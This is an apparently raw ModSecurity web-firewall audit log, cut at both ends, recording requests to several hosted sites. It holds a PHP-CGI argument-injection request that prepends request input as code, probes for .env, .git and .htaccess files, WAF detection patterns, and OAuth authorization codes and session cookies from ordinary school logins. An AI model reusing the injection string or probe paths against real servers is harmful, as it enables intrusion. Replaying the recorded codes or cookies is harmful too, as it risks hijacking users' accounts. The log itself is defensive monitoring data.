"210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "itilebanon.com"] [uri "/.env.www"] [unique_id "aIHgnFooLYw4or2LgWI37gAAAMM"] Stopwatch: 1753342108484854 5505 (- - -) Stopwatch2: 1753342108484854 5505; combined=3564, p1=896, p2=2586, p3=0, p4=0, p5=82, sr=241, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --85c6f923-Z-- --33309c10-A-- [24/Jul/2025:10:37:28.714545 +0300] aIHiuFooLYw4or2LgWJH6gAAAMg 143.244.168.161 39932 127.0.0.1 7081 --33309c10-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D""+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: new.glamileaclinics.com X-Real-IP: 143.244.168.161 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 164 User-Agent: Go-http-client/1.1 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip --33309c10-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --33309c10-H-- Message: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||new.glamileaclinics.com|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\\\\xadd cgi.force_redirect=0 \\\\xadd disable_functions="" \\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||new.glamileaclinics.com|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\\\\x5cxadd cgi.force_redirect=0 \\\\x5cxadd disable_functions=\\\\x22\\\\x22 \\\\x5cxadd allow_url_include=1 \\\\x5cxadd auto_prepend_file=php://input: \\\\xadd cgi.force_redirect=0 \\\\xadd disable_functions=\\\\x22\\\\x22 \\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] [hostname "new.glamileaclinics.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aIHiuFooLYw4or2LgWJH6gAAAMg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/new.glamileaclinics.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753342648406330 308345 (- - -) Stopwatch2: 1753342648406330 308345; combined=49628, p1=774, p2=48540, p3=0, p4=0, p5=313, sr=255, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --33309c10-Z-- --f6fd0053-A-- [24/Jul/2025:10:37:35.342951 +0300] aIHivxukk8cgt8UnU9pKFgAAAEc 143.244.168.161 42446 127.0.0.1 7081 --f6fd0053-B-- GET /.htaccess/.DS_Store HTTP/1.0 Host: new.glamileaclinics.com X-Real-IP: 143.244.168.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --f6fd0053-F-- HTTP/1.1 403 Forbidden Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 17 Jun 2025 10:47:21 GMT ETag: "31b-637c23cad36bc" Accept-Ranges: bytes Content-Length: 795 Content-Type: text/html --f6fd0053-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "new.glamileaclinics.com"] [uri "/.htaccess/.DS_Store"] [unique_id "aIHivxukk8cgt8UnU9pKFgAAAEc"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/glamileaclinics.com/new.glamileaclinics.com/.htaccess Stopwatch: 1753342655341343 1781 (- - -) Stopwatch2: 1753342655341343 1781; combined=865, p1=754, p2=0, p3=0, p4=0, p5=111, sr=165, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f6fd0053-Z-- --6dcedc61-A-- [24/Jul/2025:10:37:40.205718 +0300] aIHiw1ooLYw4or2LgWJINAAAAMM 143.244.168.161 43112 127.0.0.1 7081 --6dcedc61-B-- GET /.env HTTP/1.0 Host: new.glamileaclinics.com X-Real-IP: 143.244.168.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --6dcedc61-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --6dcedc61-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "new.glamileaclinics.com"] [uri "/.env"] [unique_id "aIHiw1ooLYw4or2LgWJINAAAAMM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/new.glamileaclinics.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753342659935757 270073 (- - -) Stopwatch2: 1753342659935757 270073; combined=28848, p1=26543, p2=2180, p3=0, p4=0, p5=124, sr=168, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6dcedc61-Z-- --bfb1907b-A-- [24/Jul/2025:10:37:40.832705 +0300] aIHixEdutIOpb_kg22i2egAAAAY 143.244.168.161 43186 127.0.0.1 7081 --bfb1907b-B-- GET /.git/config HTTP/1.0 Host: new.glamileaclinics.com X-Real-IP: 143.244.168.161 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --bfb1907b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --bfb1907b-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "new.glamileaclinics.com"] [uri "/.git/config"] [unique_id "aIHixEdutIOpb_kg22i2egAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/new.glamileaclinics.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753342660587433 245396 (- - -) Stopwatch2: 1753342660587433 245396; combined=3089, p1=711, p2=2240, p3=0, p4=0, p5=137, sr=214, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bfb1907b-Z-- --1c75a45b-A-- [24/Jul/2025:10:37:57.578740 +0300] aIHi1VooLYw4or2LgWJIuwAAAMw 141.105.87.197 49712 127.0.0.1 7081 --1c75a45b-B-- GET /administration/index.php?code=4/0AVMBsJhhWYxnXnd7NhLVDJmx737a7pzdv9X1Y6gdlyoFFGy1uqoHalw__voVQRAhwSoODQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=j2bk392enphs45gl28iu9fht71 --1c75a45b-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --1c75a45b-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHi1VooLYw4or2LgWJIuwAAAMw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753342677103342 475557 (- - -) Stopwatch2: 1753342677103342 475557; combined=5687, p1=699, p2=4643, p3=154, p4=64, p5=126, sr=170, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1c75a45b-Z-- --3082ea0b-A-- [24/Jul/2025:10:41:07.173650 +0300] aIHjklooLYw4or2LgWJNtQAAANg 195.112.198.68 40498 127.0.0.1 7081 --3082ea0b-B-- GET /administration/index.php?code=4/0AVMBsJhWVJsamhEtec4pyYNYVa9ueuns_fR6GB_QFYhHPytF6YVQQ2-IE5PrDEM74SnYgQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br accept-language: ar,en-US;q=0.9,en;q=0.8 cookie: PHPSESSID=cg1emd1u4viq18m8hmpmhu94c0 --3082ea0b-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --3082ea0b-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHjklooLYw4or2LgWJNtQAAANg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753342866718306 455502 (- - -) Stopwatch2: 1753342866718306 455502; combined=5006, p1=474, p2=4145, p3=167, p4=53, p5=167, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3082ea0b-Z-- --9118983f-A-- [24/Jul/2025:10:41:58.397517 +0300] aIHjxUdutIOpb_kg22i4GgAAABU 195.112.198.68 45228 127.0.0.1 7081 --9118983f-B-- GET /administration/index.php?code=4/0AVMBsJg8Jl2coDOV4BAoxf7As-7xy1HjRmI1IL47J8y-Dmoi0TIJKn3ZgQCatuFgYqhuFQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br accept-language: en-US,en;q=0.9 cookie: PHPSESSID=td765jvkfb16ji7bo8for51cp7 --9118983f-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --9118983f-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHjxUdutIOpb_kg22i4GgAAABU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753342917975379 422319 (- - -) Stopwatch2: 1753342917975379 422319; combined=5748, p1=479, p2=4947, p3=119, p4=68, p5=135, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9118983f-Z-- --844c2408-A-- [24/Jul/2025:10:42:07.677299 +0300] aIHjz0dutIOpb_kg22i4JgAAAA0 212.28.242.186 57192 127.0.0.1 7081 --844c2408-B-- GET /administration/index.php?code=4/0AVMBsJhZ0H2Fchdn6ZjTCKmGtgX-hRqcPcCjqqf9V3U_5HVO5xen3ENPSnWMFakJeUQA3A&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=dm30kkt6sf4b4v4rcgsnvvbg22 --844c2408-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --844c2408-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHjz0dutIOpb_kg22i4JgAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753342927272112 405368 (- - -) Stopwatch2: 1753342927272112 405368; combined=5617, p1=724, p2=4583, p3=111, p4=45, p5=153, sr=196, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --844c2408-Z-- --f7077c65-A-- [24/Jul/2025:10:44:14.914439 +0300] aIHkThukk8cgt8UnU9pOMQAAAE8 212.28.242.186 35606 127.0.0.1 7081 --f7077c65-B-- GET /administration/index.php?code=4/0AVMBsJiF5Ov5isLgR5I1S8MLMhR2-6BwSlSX3gKas5fZZLG7_GWQlHbj5aa8qmi9HYamEQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br accept-language: en-US,en;q=0.9 cookie: PHPSESSID=30b4vqh1se477lmakpb9qi7ij2 --f7077c65-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --f7077c65-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHkThukk8cgt8UnU9pOMQAAAE8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753343054473908 440725 (- - -) Stopwatch2: 1753343054473908 440725; combined=5508, p1=516, p2=4588, p3=192, p4=69, p5=143, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f7077c65-Z-- --3a259347-A-- [24/Jul/2025:10:44:51.700368 +0300] aIHkc1ooLYw4or2LgWJSdwAAANM 195.112.198.68 46038 127.0.0.1 7081 --3a259347-B-- GET /administration/index.php?code=4/0AVMBsJg8Jl2coDOV4BAoxf7As-7xy1HjRmI1IL47J8y-Dmoi0TIJKn3ZgQCatuFgYqhuFQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: 